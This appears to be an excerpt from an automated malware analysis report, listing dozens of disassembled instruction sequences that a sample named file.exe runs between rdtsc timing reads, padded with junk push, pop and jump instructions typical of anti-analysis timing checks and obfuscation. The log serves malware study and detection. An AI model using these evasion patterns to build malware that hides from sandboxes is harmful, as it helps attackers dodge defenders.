Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDAB7F second address: FDABA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F1F50F77988h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDABA7 second address: FDABAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD9822 second address: FD982F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD982F second address: FD9835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD9835 second address: FD9839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD9839 second address: FD9855 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F50CBBC36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F1F50CBBC38h 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F1F50CBBC36h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA02E second address: FDA032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA032 second address: FDA049 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F1F50CBBC3Dh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA049 second address: FDA04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA04D second address: FDA053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA053 second address: FDA07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jmp 00007F1F50F77981h 0x00000010 pop ebx 0x00000011 jp 00007F1F50F7797Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA19B second address: FDA1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F1F50CBBC49h 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA4BA second address: FDA4BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA61F second address: FDA625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA625 second address: FDA63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1F50F77983h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDA8CD second address: FDA8DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1F50CBBC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE3003 second address: FE3010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA740E second address: F8C7B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dword ptr [ebp+122D1A26h], edi 0x00000012 lea eax, dword ptr [ebp+1249C156h] 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F1F50CBBC38h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push eax 0x00000033 push ecx 0x00000034 jmp 00007F1F50CBBC48h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp], eax 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007F1F50CBBC38h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 jg 00007F1F50CBBC3Ch 0x0000005d call dword ptr [ebp+122D25E8h] 0x00000063 pushad 0x00000064 jnc 00007F1F50CBBC38h 0x0000006a push ebx 0x0000006b jbe 00007F1F50CBBC36h 0x00000071 pop ebx 0x00000072 push eax 0x00000073 push edx 0x00000074 push edi 0x00000075 pop edi 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA79A6 second address: FA79AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA79AA second address: FA79B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA79B0 second address: FA79B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA79B6 second address: FA79BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA79BA second address: FA79BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA7A9D second address: FA7AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA7AA1 second address: FA7AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA7AA7 second address: DDE81E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dword ptr [ebp+122D28B8h], edx 0x00000012 push dword ptr [ebp+122D0435h] 0x00000018 mov di, EE8Ah 0x0000001c call dword ptr [ebp+122D192Ah] 0x00000022 pushad 0x00000023 stc 0x00000024 xor eax, eax 0x00000026 mov dword ptr [ebp+122D19CAh], eax 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 clc 0x00000031 mov dword ptr [ebp+122D356Eh], eax 0x00000037 jno 00007F1F50CBBC43h 0x0000003d pushad 0x0000003e jmp 00007F1F50CBBC45h 0x00000043 popad 0x00000044 mov esi, 0000003Ch 0x00000049 mov dword ptr [ebp+122D1A77h], ecx 0x0000004f jnl 00007F1F50CBBC37h 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 pushad 0x0000005a mov eax, dword ptr [ebp+122D34DAh] 0x00000060 mov di, 58FBh 0x00000064 popad 0x00000065 lodsw 0x00000067 pushad 0x00000068 jmp 00007F1F50CBBC3Ah 0x0000006d mov cl, ah 0x0000006f popad 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 cmc 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 mov dword ptr [ebp+122D19CAh], ebx 0x0000007f pushad 0x00000080 movzx esi, ax 0x00000083 sbb ecx, 16025E9Fh 0x00000089 popad 0x0000008a nop 0x0000008b pushad 0x0000008c jmp 00007F1F50CBBC44h 0x00000091 push eax 0x00000092 push edx 0x00000093 jmp 00007F1F50CBBC44h 0x00000098 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA7E99 second address: FA7E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA7E9D second address: FA7EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA7EA1 second address: FA7EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA7FF5 second address: FA800A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA88F9 second address: F8D38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007F1F50F7797Ch 0x0000000b jnl 00007F1F50F77976h 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F1F50F77988h 0x00000018 nop 0x00000019 ja 00007F1F50F7797Ch 0x0000001f lea eax, dword ptr [ebp+1249C156h] 0x00000025 sub dword ptr [ebp+122D1ACCh], eax 0x0000002b mov dx, 1BADh 0x0000002f nop 0x00000030 push ebx 0x00000031 jmp 00007F1F50F77982h 0x00000036 pop ebx 0x00000037 push eax 0x00000038 jmp 00007F1F50F77983h 0x0000003d nop 0x0000003e call 00007F1F50F77980h 0x00000043 add dx, 257Fh 0x00000048 pop edi 0x00000049 call dword ptr [ebp+122D1959h] 0x0000004f push eax 0x00000050 push esi 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE23D6 second address: FE23DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE23DF second address: FE23FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007F1F50F77989h 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F1F50F77981h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE2696 second address: FE26C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F1F50CBBC3Eh 0x0000000c jnp 00007F1F50CBBC36h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 js 00007F1F50CBBC70h 0x0000001b jne 00007F1F50CBBC44h 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE285E second address: FE2868 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1F50F77976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE2868 second address: FE2871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE2871 second address: FE2878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE2878 second address: FE2890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F1F50CBBC41h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE2A2B second address: FE2A3F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1F50F77976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jng 00007F1F50F77988h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE8850 second address: FE8856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE78A9 second address: FE78B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE78B5 second address: FE78B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE7D2A second address: FE7D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE7D2E second address: FE7D40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE7D40 second address: FE7D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE7D46 second address: FE7D78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC42h 0x00000007 jmp 00007F1F50CBBC42h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE8275 second address: FE829C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77981h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1F50F7797Ch 0x0000000e jnl 00007F1F50F77976h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBDFB second address: FEBE11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC42h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBE11 second address: FEBE17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBE17 second address: FEBE1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBE1D second address: FEBE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50F77983h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEBE34 second address: FEBE50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c jg 00007F1F50CBBC36h 0x00000012 push eax 0x00000013 pop eax 0x00000014 je 00007F1F50CBBC36h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF1146 second address: FF1150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1F50F77976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF1150 second address: FF1154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF1154 second address: FF115A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF12C3 second address: FF12CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF12CF second address: FF12D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF12D3 second address: FF12D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF1732 second address: FF173A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF173A second address: FF1747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F1F50CBBC36h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF1C58 second address: FF1C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF1C5E second address: FF1C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF1D98 second address: FF1DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF1DA1 second address: FF1DA6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF200E second address: FF201A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF0E62 second address: FF0E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1F50CBBC36h 0x0000000a jmp 00007F1F50CBBC42h 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jnl 00007F1F50CBBC36h 0x0000001a jng 00007F1F50CBBC36h 0x00000020 jo 00007F1F50CBBC36h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF0E96 second address: FF0EA0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1F50F77982h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5FA46 second address: F5FA51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1F50CBBC36h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5FA51 second address: F5FA5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F1F50F77976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5FA5B second address: F5FA5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF4BCC second address: FF4BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF4BD0 second address: FF4BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F1F50CBBC3Bh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF4BF0 second address: FF4BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF4BF4 second address: FF4C1C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1F50CBBC36h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jng 00007F1F50CBBC36h 0x00000013 jmp 00007F1F50CBBC41h 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF786C second address: FF7872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF7872 second address: FF787D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF787D second address: FF7882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF7882 second address: FF78AB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1F50CBBC3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1F50CBBC47h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF7A1F second address: FF7A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD1BF second address: FFD1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD431 second address: FFD437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD437 second address: FFD468 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1F50CBBC40h 0x0000000d jmp 00007F1F50CBBC49h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD468 second address: FFD49A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1F50F77982h 0x0000000c jp 00007F1F50F77976h 0x00000012 jo 00007F1F50F77976h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD49A second address: FFD4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50CBBC3Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD4AB second address: FFD4B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD4B1 second address: FFD4B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFDAC0 second address: FFDAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100228F second address: 100229E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jnl 00007F1F50CBBC38h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100229E second address: 10022A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
